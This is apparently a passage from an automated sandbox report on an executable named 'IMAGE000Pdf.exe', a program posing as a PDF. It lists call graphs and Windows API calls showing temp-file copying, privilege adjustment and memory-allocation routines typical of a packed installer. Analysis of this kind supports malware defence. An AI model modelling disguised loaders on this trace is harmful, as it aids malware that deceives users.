2470 405a16 2469->2470 2471 405a0a CloseHandle 2469->2471 2470->2327 2471->2470 2472->2275 2660 4063ee lstrcpynW 2473->2660 2475 405ddc 2661 405d6e CharNextW CharNextW 2475->2661 2478 4037e3 2478->2272 2487 4063ee lstrcpynW 2478->2487 2479 40669d 5 API calls 2485 405df2 2479->2485 2480 405e23 lstrlenW 2481 405e2e 2480->2481 2480->2485 2483 405cc3 3 API calls 2481->2483 2484 405e33 GetFileAttributesW 2483->2484 2484->2478 2485->2478 2485->2480 2486 405d0f 2 API calls 2485->2486 2667 40674c FindFirstFileW 2485->2667 2486->2480 2487->2307 2488->2276 2490 4039fb 2489->2490 2491 4039ed CloseHandle 2489->2491 2670 403a28 2490->2670 2491->2490 2497 405a69 2496->2497 2498 403835 ExitProcess 2497->2498 2499 405a7d MessageBoxIndirectW 2497->2499 2499->2498 2501 4059b2 2500->2501 2502 4059b6 GetLastError 2500->2502 2501->2315 2502->2501 2503->2316 2505 401389 2 API calls 2504->2505 2506 401420 2505->2506 2506->2286 2514 4066aa 2507->2514 2508 406725 CharPrevW 2511 406720 2508->2511 2509 406713 CharNextW 2509->2511 2509->2514 2510 405cf0 CharNextW 2510->2514 2511->2508 2512 406746 2511->2512 2512->2348 2513 4066ff CharNextW 2513->2514 2514->2509 2514->2510 2514->2511 2514->2513 2515 40670e CharNextW 2514->2515 2515->2509 2517 40348f 2516->2517 2518 405cdf lstrcatW 2516->2518 2517->2351 2518->2517 2520 405f20 GetTickCount GetTempFileNameW 2519->2520 2521 4034a0 2520->2521 2522 405f56 2520->2522 2521->2262 2522->2520 2522->2521 2523->2357 2524->2359 2526 405d1d 2525->2526 2527 405d23 CharPrevW 2526->2527 2528 403081 2526->2528 2527->2526 2527->2528 2529 4063ee lstrcpynW 2528->2529 2529->2363 2531 402fd2 2530->2531 2532 402fba 2530->2532 2535 402fe2 GetTickCount 2531->2535 2536 402fda 2531->2536 2533 402fc3 DestroyWindow 2532->2533 2534 402fca 2532->2534 2533->2534 2534->2366 2538 402ff0 CreateDialogParamW ShowWindow 2535->2538 2539 403013 2535->2539 2566 40681f 2536->2566 2538->2539 2539->2366 2541->2371 2544 403265 2542->2544 2543 403293 2546 403444 ReadFile 2543->2546 2544->2543 2583 40345a SetFilePointer 2544->2583 2547 40329e 2546->2547 2548 4032b0 GetTickCount 2547->2548 2549 4033dd 2547->2549 2551 4033c7 2547->2551 2548->2551 2558 4032dc 2548->2558 2550 40341f 2549->2550 2555 4033e1 2549->2555 2552 403444 ReadFile 2550->2552 2551->2379 2552->2551 2553 403444 ReadFile 2553->2558 2554 403444 ReadFile 2554->2555 2555->2551 2555->2554 2556 405f96 WriteFile 2555->2556 2556->2555 2557 403332 GetTickCount 2557->2558 2558->2551 2558->2553 2558->2557 2559 403357 MulDiv wsprintfW 2558->2559 2581 405f96 WriteFile 2558->2581 2570 405456 2559->2570 2584 405f67 ReadFile 2562->2584 2565->2373 2567 40683c PeekMessageW 2566->2567 2568 406832 DispatchMessageW 2567->2568 2569 402fe0 2567->2569 2568->2567 2569->2366 2571 405471 2570->2571 2572 405513 2570->2572 2573 40548d lstrlenW 2571->2573 2574 40642b 17 API calls 2571->2574 2572->2558 2575 4054b6 2573->2575 2576 40549b lstrlenW 2573->2576 2574->2573 2578 4054c9 2575->2578 2579 4054bc SetWindowTextW 2575->2579 2576->2572 2577 4054ad lstrcatW 2576->2577 2577->2575 2578->2572 2580 4054cf SendMessageW SendMessageW SendMessageW 2578->2580 2579->2578 2580->2572 2582 405fb4 2581->2582 2582->2558 2583->2543 2585 403457 2584->2585 2585->2382 2587 403da7 2586->2587 2608 406335 wsprintfW 2587->2608 2589 403e18 2609 403e4c 2589->2609 2591 403b48 2591->2396 2592 403e1d 2592->2591 2593 40642b 17 API calls 2592->2593 2593->2592 2594->2392 2612 40625b 2595->2612 2598 4062f0 RegQueryValueExW RegCloseKey 2599 403b19 2598->2599 2599->2391 2599->2393 2600->2398 2616 404390 2601->2616 2603 40554c 2607 405573 2603->2607 2619 401389 2603->2619 2604 404390 SendMessageW 2605 405585 OleUninitialize 2604->2605 2605->2427 2607->2604 2608->2589 2610 40642b 17 API calls 2609->2610 2611 403e5a SetWindowTextW 2610->2611 2611->2592 2613 40626a 2612->2613 2614 406273 RegOpenKeyExW 2613->2614 2615 40626e 2613->2615 2614->2615 2615->2598 2615->2599 2617 4043a8 2616->2617 2618 404399 SendMessageW 2616->2618 2617->2603 2618->2617 2621 401390 2619->2621 2620 4013fe 2620->2603 2621->2620 2622 4013cb MulDiv SendMessageW 2621->2622 2622->2621 2623->2460 2624->2460 2625->2450 2627 406090 GetShortPathNameW 2626->2627 2628 40606a 2626->2628 2630 4060a5 2627->2630 2631 4061af 2627->2631 2653 405ee4 GetFileAttributesW CreateFileW 2628->2653 2630->2631 2633 4060ad wsprintfA 2630->2633 2631->2466 2632 406074 CloseHandle GetShortPathNameW 2632->2631 2634 406088 2632->2634 2635 40642b 17 API calls 2633->2635 2634->2627 2634->2631 2636 4060d5 2635->2636 2654 405ee4 GetFileAttributesW CreateFileW 2636->2654 2638 4060e2 2638->2631 2639 4060f1 GetFileSize GlobalAlloc 2638->2639 2640 406113 2639->2640 2641 4061a8 CloseHandle 2639->2641 2642 405f67 ReadFile 2640->2642 2641->2631 2643 40611b 2642->2643 2643->2641 2655 405e49 lstrlenA 2643->2655 2646 406132 lstrcpyA 2649 406154 2646->2649 2647 406146 2648 405e49 4 API calls 2647->2648 2648->2649 2650 40618b SetFilePointer 2649->2650 2651 405f96 WriteFile 2650->2651 2652 4061a1 GlobalFree 2651->2652 2652->2641 2653->2632 2654->2638 2656 405e8a lstrlenA 2655->2656 2657 405e92 2656->2657 2658 405e63 lstrcmpiA 2656->2658 2657->2646 2657->2647 2658->2657 2659 405e81 CharNextA 2658->2659 2659->2656 2660->2475 2662 405d8b 2661->2662 2666 405d9d 2661->2666 2664 405d98 CharNextW 2662->2664 2662->2666 2663 405dc1 2663->2478 2663->2479 2664->2663 2665 405cf0 CharNextW 2665->2666 2666->2663 2666->2665 2668 406762 FindClose 2667->2668 2669 40676d 2667->2669 2668->2669 2669->2485 2672 403a36 2670->2672 2671 403a00 2674 405b00 2671->2674 2672->2671 2673 403a3b FreeLibrary GlobalFree 2672->2673 2673->2671 2673->2673 2675 405dcb 18 API calls 2674->2675 2676 405b20 2675->2676 2677 405b28 DeleteFileW 2676->2677 2678 405b3f 2676->2678 2679 403816 OleUninitialize 2677->2679 2680 405c5f 2678->2680 2713 4063ee lstrcpynW 2678->2713 2679->2283 2679->2284 2680->2679 2687 40674c 2 API calls 2680->2687 2682 405b65 2683 405b78 2682->2683 2684 405b6b lstrcatW 2682->2684 2686 405d0f 2 API calls 2683->2686 2685 405b7e 2684->2685 2688 405b8e lstrcatW 2685->2688 2690 405b99 lstrlenW FindFirstFileW 2685->2690 2686->2685 2689 405c84 2687->2689 2688->2690 2689->2679 2691 405c88 2689->2691 2690->2680 2692 405bbb 2690->2692 2693 405cc3 3 API calls 2691->2693 2695 405c42 FindNextFileW 2692->2695 2705 405b00 60 API calls 2692->2705 2711 405c0c 2692->2711 2714 4063ee lstrcpynW 2692->2714 2694 405c8e 2693->2694 2696 405ab8 5 API calls 2694->2696 2695->2692 2699 405c58 FindClose 2695->2699 2698 405c9a 2696->2698 2700 405cb4 2698->2700 2703 405c9e 2698->2703 2699->2680 2702 405456 24 API calls 2700->2702 2702->2679 2703->2679 2704 405456 24 API calls 2703->2704 2706 405cab 2704->2706 2705->2711 2707 4061b4 36 API calls 2706->2707 2709 405cb2 2707->2709 2708 405456 24 API calls 2708->2695 2709->2679 2710 405456 24 API calls 2710->2711 2711->2695 2711->2708 2711->2710 2712 4061b4 36 API calls 2711->2712 2715 405ab8 2711->2715 2712->2711 2713->2682 2714->2692 2723 405ebf GetFileAttributesW 2715->2723 2718 405ad3 RemoveDirectoryW 2721 405ae1 2718->2721 2719 405adb DeleteFileW 2719->2721 2720 405ae5 2720->2711 2721->2720 2722 405af1 SetFileAttributesW 2721->2722 2722->2720 2724 405ed1 SetFileAttributesW 2723->2724 2725 405ac4 2723->2725 2724->2725 2725->2718 2725->2719 2725->2720 2726 6f931777 2727 6f9317aa 2726->2727 2768 6f931b5f 2727->2768 2729 6f9317b1 2730 6f9318d6 2729->2730 2731 6f9317c2 2729->2731 2732 6f9317c9 2729->2732 2818 6f93239e 2731->2818 2802 6f9323e0 2732->2802 2737 6f93180f 2831 6f9325b5 2737->2831 2738 6f93182d 2743 6f931833 2738->2743 2744 6f93187e 2738->2744 2739 6f9317f8 2752 6f9317ee 2739->2752 2828 6f932d83 2739->2828 2740 6f9317df 2742 6f9317e5 2740->2742 2748 6f9317f0 2740->2748 2742->2752 2812 6f932af8 2742->2812 2850 6f9315c6 2743->2850 2746 6f9325b5 10 API calls 2744->2746 2758 6f93186f 2746->2758 2747 6f931815 2842 6f9315b4 2747->2842 2822 6f932770 2748->2822 2752->2737 2752->2738 2756 6f9317f6 2756->2752 2757 6f9325b5 10 API calls 2757->2758 2759 6f9318c5 2758->2759 2856 6f932578 2758->2856 2759->2730 2761 6f9318cf GlobalFree 2759->2761 2761->2730 2765 6f9318b1 2765->2759 2860 6f93153d wsprintfW 2765->2860 2766 6f9318aa FreeLibrary 2766->2765 2863 6f93121b GlobalAlloc 2768->2863 2770 6f931b86 2864 6f93121b GlobalAlloc 2770->2864 2772 6f931dcb GlobalFree GlobalFree GlobalFree 2774 6f931de8 2772->2774 2781 6f931e32 2772->2781 2773 6f931b91 2773->2772 2777 6f931c86 GlobalAlloc 2773->2777 2778 6f93210e 2773->2778 2780 6f931cd1 lstrcpyW 2773->2780 2773->2781 2782 6f931cef GlobalFree 2773->2782 2785 6f931cdb lstrcpyW 2773->2785 2789 6f932086 2773->2789 2793 6f931fc7 GlobalFree 2773->2793 2795 6f93122c 2 API calls 2773->2795 2796 6f931d2d 2773->2796 2775 6f9321de 2774->2775 2776 6f931dfd 2774->2776 2774->2781 2779 6f932200 GetModuleHandleW 2775->2779 2775->2781 2776->2781 2867 6f93122c 2776->2867 2777->2773 2778->2781 2799 6f932176 lstrcpyW 2778->2799 2783 6f932211 LoadLibraryW 2779->2783 2784 6f932226 2779->2784 2780->2785 2781->2729 2782->2773 2783->2781 2783->2784 2871 6f93161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2784->2871 2785->2773 2787 6f932238 2788 6f932278 2787->2788 2800 6f932262 GetProcAddress 2787->2800 2788->2781 2792 6f932285 lstrlenW 2788->2792 2870 6f93121b GlobalAlloc 2789->2870 2872 6f93161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2792->2872 2793->2773 2795->2773 2796->2773 2865 6f93158f GlobalSize GlobalAlloc 2796->2865 2797 6f93229f 2797->2781 2799->2781 2800->2788 2801 6f93208f 2801->2729 2809 6f9323f8 2802->2809 2803 6f93122c GlobalAlloc lstrcpynW 2803->2809 2805 6f932521 GlobalFree 2806 6f9317cf 2805->2806 2805->2809 2806->2739 2806->2740 2806->2752 2807 6f9324a0 GlobalAlloc WideCharToMultiByte 2807->2805 2808 6f9324cb GlobalAlloc CLSIDFromString 2808->2805 2809->2803 2809->2805 2809->2807 2809->2808 2810 6f9324ea 2809->2810 2874 6f9312ba 2809->2874 2810->2805 2878 6f932704 2810->2878 2813 6f932b0a 2812->2813 2814 6f932baf VirtualAlloc 2813->2814 2817 6f932bcd 2814->2817 2816 6f932c99 2816->2752 2881 6f932aa2 2817->2881 2819 6f9323b3 2818->2819 2820 6f9323be GlobalAlloc 2819->2820 2821 6f9317c8 2819->2821 2820->2819 2821->2732 2826 6f9327a0 2822->2826 2823 6f93283b GlobalAlloc 2827 6f93285e 2823->2827 2824 6f93284e 2825 6f932854 GlobalSize 2824->2825 2824->2827 2825->2827 2826->2823 2826->2824 2827->2756 2830 6f932d8e 2828->2830 2829 6f932dce GlobalFree 2830->2829 2885 6f93121b GlobalAlloc 2831->2885 2833 6f9325bf 2834 6f93266b lstrcpynW 2833->2834 2835 6f93265a StringFromGUID2 2833->2835 2836 6f932638 MultiByteToWideChar 2833->2836 2837 6f9326a2 GlobalFree 2833->2837 2838 6f93267e wsprintfW 2833->2838 2839 6f9326d7 GlobalFree 2833->2839 2840 6f931272 2 API calls 2833->2840 2886 6f9312e1 2833->2886 2834->2833 2835->2833 2836->2833 2837->2833 2838->2833 2839->2747 2840->2833 2890 6f93121b GlobalAlloc 2842->2890 2844 6f9315b9 2845 6f9315c6 2 API calls 2844->2845 2846 6f9315c3 2845->2846 2847 6f931272 2846->2847 2848 6f9312b5 GlobalFree 2847->2848 2849 6f93127b GlobalAlloc lstrcpynW 2847->2849 2848->2758 2849->2848 2851 6f9315d2 wsprintfW 2850->2851 2852 6f9315ff lstrcpyW 2850->2852 2855 6f931618 2851->2855 2852->2855 2855->2757 2857 6f932586 2856->2857 2858 6f931891 2856->2858 2857->2858 2859 6f9325a2 GlobalFree 2857->2859 2858->2765 2858->2766 2859->2857 2861 6f931272 2 API calls 2860->2861 2862 6f93155e 2861->2862 2862->2759 2863->2770 2864->2773 2866 6f9315ad 2865->2866 2866->2796 2873 6f93121b GlobalAlloc 2867->2873 2869 6f93123b lstrcpynW 2869->2781 2870->2801 2871->2787 2872->2797 2873->2869 2875 6f9312c1 2874->2875 2876 6f93122c 2 API calls 2875->2876 2877 6f9312df 2876->2877 2877->2809 2879 6f932712 VirtualAlloc 2878->2879 2880 6f932768 2878->2880 2879->2880 2880->2810 2882 6f932aad 2881->2882 2883 6f932ab2 GetLastError 2882->2883 2884 6f932abd 2882->2884 2883->2884 2884->2816 2885->2833 2887 6f9312ea 2886->2887 2888 6f93130c 2886->2888 2887->2888 2889 6f9312f0 lstrcpyW 2887->2889 2888->2833 2889->2888 2890->2844 3016 6f9316d4 3017 6f931703 3016->3017 3018 6f931b5f 22 API calls 3017->3018 3019 6f93170a 3018->3019 3020 6f931711 3019->3020 3021 6f93171d 3019->3021 3022 6f931272 2 API calls 3020->3022 3023 6f931727 3021->3023 3024 6f931744 3021->3024 3025 6f93171b 3022->3025 3026 6f93153d 3 API calls 3023->3026 3027 6f93174a 3024->3027 3028 6f93176e 3024->3028 3030 6f93172c 3026->3030 3031 6f9315b4 3 API calls 3027->3031 3029 6f93153d 3 API calls 3028->3029 3029->3025 3032 6f9315b4 3 API calls 3030->3032 3033 6f93174f 3031->3033 3034 6f931732 3032->3034 3035 6f931272 2 API calls 3033->3035 3036 6f931272 2 API calls 3034->3036 3037 6f931755 GlobalFree 3035->3037 3039 6f931738 GlobalFree 3036->3039 3037->3025 3038 6f931769 GlobalFree 3037->3038 3038->3025 3039->3025 3040 6f9318d9 3041 6f9318fc 3040->3041 3042 6f931931 GlobalFree 3041->3042 3043 6f931943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 3041->3043 3042->3043 3044 6f931272 2 API calls 3043->3044 3045 6f931ace GlobalFree GlobalFree 3044->3045 2891 403e6b 2892 403e83 2891->2892 2893 403fbe 2891->2893 2892->2893 2894 403e8f 2892->2894 2895 40400f 2893->2895 2896 403fcf GetDlgItem GetDlgItem 2893->2896 2897 403e9a SetWindowPos 2894->2897 2898 403ead 2894->2898 2900 404069 2895->2900 2908 401389 2 API calls 2895->2908 2899 404344 18 API calls 2896->2899 2897->2898 2902 403eb2 ShowWindow 2898->2902 2903 403eca 2898->2903 2904 403ff9 SetClassLongW 2899->2904 2901 404390 SendMessageW 2900->2901 2953 403fb9 2900->2953 2950 40407b 2901->2950 2902->2903 2905 403ed2 DestroyWindow 2903->2905 2906 403eec 2903->2906 2907 40140b 2 API calls 2904->2907 2961 4042cd 2905->2961 2909 403ef1 SetWindowLongW 2906->2909 2910 403f02 2906->2910 2907->2895 2911 404041 2908->2911 2909->2953 2914 403fab 2910->2914 2915 403f0e GetDlgItem 2910->2915 2911->2900 2916 404045 SendMessageW 2911->2916 2912 40140b 2 API calls 2912->2950 2913 4042cf DestroyWindow EndDialog 2913->2961 2971 4043ab 2914->2971 2919 403f21 SendMessageW IsWindowEnabled 2915->2919 2920 403f3e 2915->2920 2916->2953 2918 4042fe ShowWindow 2918->2953 2919->2920 2919->2953 2922 403f4b 2920->2922 2923 403f92 SendMessageW 2920->2923 2924 403f5e 2920->2924 2932 403f43 2920->2932 2921 40642b 17 API calls 2921->2950 2922->2923 2922->2932 2923->2914 2927 403f66 2924->2927 2928 403f7b 2924->2928 2926 404344 18 API calls 2926->2950 2930 40140b 2 API calls 2927->2930 2931 40140b 2 API calls 2928->2931 2929 403f79 2929->2914 2930->2932 2933 403f82 2931->2933 2968 40431d 2932->2968 2933->2914 2933->2932 2935 4040f6 GetDlgItem 2936 404113 ShowWindow KiUserCallbackDispatcher 2935->2936 2937 40410b 2935->2937 2965 404366 KiUserCallbackDispatcher 2936->2965 2937->2936 2939 40413d EnableWindow 2944 404151 2939->2944 2940 404156 GetSystemMenu EnableMenuItem SendMessageW 2941 404186 SendMessageW 2940->2941 2940->2944 2941->2944 2943 403e4c 18 API calls 2943->2944 2944->2940 2944->2943 2966 404379 SendMessageW 2944->2966 2967 4063ee lstrcpynW 2944->2967 2946 4041b5 lstrlenW 2947 40642b 17 API calls 2946->2947 2948 4041cb SetWindowTextW 2947->2948 2949 401389 2 API calls 2948->2949 2949->2950 2950->2912 2950->2913 2950->2921 2950->2926 2951 40420f DestroyWindow 2950->2951 2950->2953 2962 404344 2950->2962 2952 404229 CreateDialogParamW 2951->2952 2951->2961 2954 40425c 2952->2954 2952->2961 2955 404344 18 API calls 2954->2955 2956 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2955->2956 2957 401389 2 API calls 2956->2957 2958 4042ad 2957->2958 2958->2953 2959 4042b5 ShowWindow 2958->2959 2960 404390 SendMessageW 2959->2960 2960->2961 2961->2918 2961->2953 2963 40642b 17 API calls 2962->2963 2964 40434f SetDlgItemTextW 2963->2964 2964->2935 2965->2939 2966->2944 2967->2946 2969 404324 2968->2969 2970 40432a SendMessageW 2968->2970 2969->2970 2970->2929 2972 40446e 2971->2972 2973 4043c3 GetWindowLongW 2971->2973 2972->2953 2973->2972 2974 4043d8 2973->2974 2974->2972 2975 404405 GetSysColor 2974->2975 2976 404408 2974->2976 2975->2976 2977 404418 SetBkMode 2976->2977 2978 40440e SetTextColor 2976->2978 2979 404430 GetSysColor 2977->2979 2980 404436 2977->2980 2978->2977 2979->2980 2981 404447 2980->2981 2982 40443d SetBkColor 2980->2982 2981->2972 2983 404461 CreateBrushIndirect 2981->2983 2984 40445a DeleteObject 2981->2984 2982->2981 2983->2972 2984->2983 3050 402f2b 3051 402f56 3050->3051 3052 402f3d SetTimer 3050->3052 3053 402fab 3051->3053 3054 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3051->3054 3052->3051 3054->3053 3055 6f931058 3056 6f931074 3055->3056 3057 6f9310dd 3056->3057 3058 6f931092 3056->3058 3059 6f931516 GlobalFree 3056->3059 3060 6f931516 GlobalFree 3058->3060 3059->3058 3061 6f9310a2 3060->3061 3062 6f9310b2 3061->3062 3063 6f9310a9 GlobalSize 3061->3063 3064 6f9310b6 GlobalAlloc 3062->3064 3065 6f9310c7 3062->3065 3063->3062 3066 6f93153d 3 API calls 3064->3066 3067 6f9310d2 GlobalFree 3065->3067 3066->3065 3067->3057 2985 6f9329df 2986 6f932a2f 2985->2986 2987 6f9329ef VirtualProtect 2985->2987 2987->2986 3068 6f93103d 3069 6f93101b 5 API calls 3068->3069 3070 6f931056 3069->3070 2988 6f932ca3 2989 6f932cbb 2988->2989 2990 6f93158f 2 API calls 2989->2990 2991 6f932cd6 2990->2991 2992 6f9310e1 2994 6f931111 2992->2994 2993 6f9311d8 GlobalFree 2994->2993 2995 6f9312ba 2 API calls 2994->2995 2996 6f9311d3 2994->2996 2997 6f931272 2 API calls 2994->2997 2998 6f931164 GlobalAlloc 2994->2998 2999 6f9311f8 GlobalFree 2994->2999 3000 6f9312e1 lstrcpyW 2994->3000 3001 6f9311c4 GlobalFree 2994->3001 2995->2994 2996->2993 2997->3001 2998->2994 2999->2994 3000->2994 3001->2994 3002 6f931000 3005 6f93101b 3002->3005 3012 6f931516 3005->3012 3007 6f931020 3008 6f931027 GlobalAlloc 3007->3008 3009 6f931024 3007->3009 3008->3009 3010 6f93153d 3 API calls 3009->3010 3011 6f931019 3010->3011 3014 6f93151c 3012->3014 3013 6f931522 3013->3007 3014->3013 3015 6f93152e GlobalFree 3014->3015 3015->3007 3046 6f932349 3047 6f9323b3 3046->3047 3048 6f9323be GlobalAlloc 3047->3048 3049 6f9323dd 3047->3049 3048->3047 3071 6f93166d 3072 6f931516 GlobalFree 3071->3072 3073 6f931685 3072->3073 3074 6f9316cb GlobalFree 3073->3074 3075 6f9316a0 3073->3075 3076 6f9316b7 VirtualFree 3073->3076 3075->3074 3076->3074

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 7 4034eb 1->7 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 7->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 21 403533 17->21 21->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 30 4035d2-4035d6 28->30 31 4035cb-4035d0 28->31 38 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->38 39 403746-403760 DeleteFileW call 403015 29->39 33 4035d8-4035dc 30->33 34 4035dd-4035e1 30->34 31->30 31->31 33->34 36 4036a0-4036ad call 405cf0 34->36 37 4035e7-4035ed 34->37 54 4036b1-4036b7 36->54 55 4036af-4036b0 36->55 42 403608-403641 37->42 43 4035ef-4035f7 37->43 38->39 52 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 38->52 56 403811-403821 call 4039e3 OleUninitialize 39->56 57 403766-40376c 39->57 50 403643-403648 42->50 51 40365e-403698 42->51 48 4035f9-4035fc 43->48 49 4035fe 43->49 48->42 48->49 49->42 50->51 58 40364a-403652 50->58 51->36 53 40369a-40369e 51->53 52->39 52->56 53->36 60 4036bf-4036cd call 4063ee 53->60 54->28 61 4036bd 54->61 55->54 75 403947-40394d 56->75 76 403827-403837 call 405a54 ExitProcess 56->76 62 403801-403808 call 403abd 57->62 63 403772-40377d call 405cf0 57->63 65 403654-403657 58->65 66 403659 58->66 68 4036d2 60->68 61->68 74 40380d 62->74 80 4037cb-4037d5 63->80 81 40377f-4037b4 63->81 65->51 65->66 66->51 68->29 74->56 78 4039cb-4039d3 75->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 75->79 82 4039d5 78->82 83 4039d9-4039dd ExitProcess 78->83 87 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 40399b-4039a9 call 4067e3 79->88 85 4037d7-4037e5 call 405dcb 80->85 86 40383d-403851 call 4059bf lstrcatW 80->86 89 4037b6-4037ba 81->89 82->83 85->56 99 4037e7-4037fd call 4063ee * 2 85->99 100 403853-403859 lstrcatW 86->100 101 40385e-403878 lstrcatW lstrcmpiW 86->101 87->88 102 4039b7-4039c2 ExitWindowsEx 88->102 103 4039ab-4039b5 88->103 93 4037c3-4037c7 89->93 94 4037bc-4037c1 89->94 93->89 98 4037c9 93->98 94->93 94->98 98->80 99->62 100->101 101->56 105 40387a-40387d 101->105 102->78 106 4039c4-4039c6 call 40140b 102->106 103->102 103->106 108 403886 call 4059a2 105->108 109 40387f call 405925 105->109 106->78 117 40388b-403899 SetCurrentDirectoryW 108->117 116 403884 109->116 116->117 118 4038a6-4038cf call 4063ee 117->118 119 40389b-4038a1 call 4063ee 117->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-40391d call 4061b4 call 40642b call 4059d7 127->129 128->56 137 403922-403924 129->137 137->126 138 403926-40392d CloseHandle 137->138 138->126
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 004034C5
                                      • GetVersion.KERNEL32 ref: 004034CB
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                      • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                      • OleInitialize.OLE32(00000000), ref: 00403542
                                      • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                      • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000020,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                        • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                        • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                      • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                        • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                      • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                      • ExitProcess.KERNEL32 ref: 00403837
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\IMAGE000Pdf.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                      • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\IMAGE000Pdf.exe,0079F708,00000001,?,00000007,00000009,0000000B), ref: 004038FA
                                      • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                      • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                      • ExitProcess.KERNEL32 ref: 004039DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2444516494.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2444498118.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444532065.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2444544641.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
